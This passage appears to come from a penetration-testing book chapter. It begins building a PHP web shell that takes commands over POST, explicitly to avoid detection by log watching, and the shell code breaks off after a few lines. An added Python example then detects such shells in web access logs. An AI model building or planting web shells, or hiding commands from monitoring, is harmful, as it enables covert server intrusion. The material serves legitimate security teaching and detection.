
156 CHAPTER 5 Introduction to Web scripting with PHP

FIGURE 5.10 Output from exectest.php

PUTTING IT ALL TOGETHER

Having a basic PHP shell at our disposal will be very useful for penetration tests where we either have the ability to run code on the Web server or have the ability to include our own PHP. To try out the skills we have just learned, we are going to build a basic PHP shell. We will be looking at command execution, form handling, conditionals, and more.

We don't want anyone to notice what we're doing with our script, so to make it a little bit harder to detect by simple log watching, we are going to be submitting our information via POST requests. We want to be able to submit shell commands to our script and see the output. To be helpful, it would also be nice if we kept track of our previous output so that we could do some basic scroll-back.

Let's build our simple PHP shell.

<?php
if($_POST['command'])
{
    if($_POST['out'])
    {
        $out = $_POST['out'] . "\n";
        if(strlen($out) > 2000)
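
Seen from the monitoring side, moving the command into a POST body keeps it out of the access log, but the request pattern is still recorded. The following is an added example, not code from the book: it flags PHP scripts that receive many successful POSTs from a single client with constantly changing response sizes, which is how a shell with scroll-back appears in a combined-format log. The log format, paths, addresses and thresholds are assumptions.

```python
import re
from collections import defaultdict

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def suspicious_post_targets(log_text, min_posts=5, max_clients=1, min_size_ratio=0.8):
    """Return [(path, posts, clients, distinct_sizes)] for PHP scripts with many
    successful POSTs, from very few clients, whose response sizes keep changing.
    Thresholds are illustrative assumptions, not tuned values."""
    stats = defaultdict(lambda: {"posts": 0, "clients": set(), "sizes": set()})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["status"] != "200":
            continue
        path = m["url"].split("?", 1)[0]      # ignore any query string
        if not path.lower().endswith(".php"):
            continue
        s = stats[path]
        s["posts"] += 1
        s["clients"].add(m["ip"])
        if m["size"] != "-":
            s["sizes"].add(int(m["size"]))
    hits = []
    for path, s in stats.items():
        if (s["posts"] >= min_posts and len(s["clients"]) <= max_clients
                and len(s["sizes"]) >= min_size_ratio * s["posts"]):
            hits.append((path, s["posts"], len(s["clients"]), len(s["sizes"])))
    return sorted(hits)

def _line(ip, method, url, size, status=200):
    # Build one constructed "combined"-format access-log line.
    return (f'{ip} - - [12/Mar/2024:10:00:00 +0000] "{method} {url} HTTP/1.1" '
            f'{status} {size} "-" "Mozilla/5.0"')

# Constructed sample traffic; hosts, paths and sizes are invented for illustration.
SAMPLE_LOG = "\n".join(
    [_line("203.0.113.7", "GET", "/uploads/img.php", 412)]
    + [_line("203.0.113.7", "POST", "/uploads/img.php", n)
       for n in (655, 980, 1412, 1760, 2210, 2398)]           # growing output
    + [_line(f"198.51.100.{i}", "POST", "/login.php", 1530) for i in range(1, 7)]
    + [_line("192.0.2.10", "POST", "/admin/save.php", 88) for _ in range(6)]
)

if __name__ == "__main__":
    for hit in suspicious_post_targets(SAMPLE_LOG):
        print(hit)
```

The login form (many clients, one response size) and the admin save endpoint (one client, one response size) are not flagged; only the script whose replies change on every POST is.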